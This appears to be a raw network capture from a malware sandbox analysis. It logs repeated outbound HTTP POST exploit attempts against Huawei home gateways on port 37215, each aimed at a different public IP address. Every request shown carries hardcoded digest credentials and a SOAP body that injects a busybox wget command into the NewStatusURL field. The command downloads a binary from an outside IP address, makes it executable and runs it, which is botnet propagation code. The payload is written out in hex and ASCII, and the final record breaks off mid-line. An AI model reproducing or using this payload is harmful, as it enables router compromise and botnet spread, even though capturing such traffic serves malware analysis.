                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1710192.168.2.1547738197.92.50.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462349892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1711192.168.2.1543088197.121.116.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462376118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1712192.168.2.1558394197.230.89.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462397099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1713192.168.2.1542214197.27.138.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462421894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1714192.168.2.1545254197.8.109.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462435961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1715192.168.2.1556252197.85.47.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462461948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1716192.168.2.1548140197.60.45.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462491989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1717192.168.2.1536184197.251.128.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462512970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1718192.168.2.1536630197.123.24.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462538004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1719192.168.2.1537796197.144.151.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462554932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 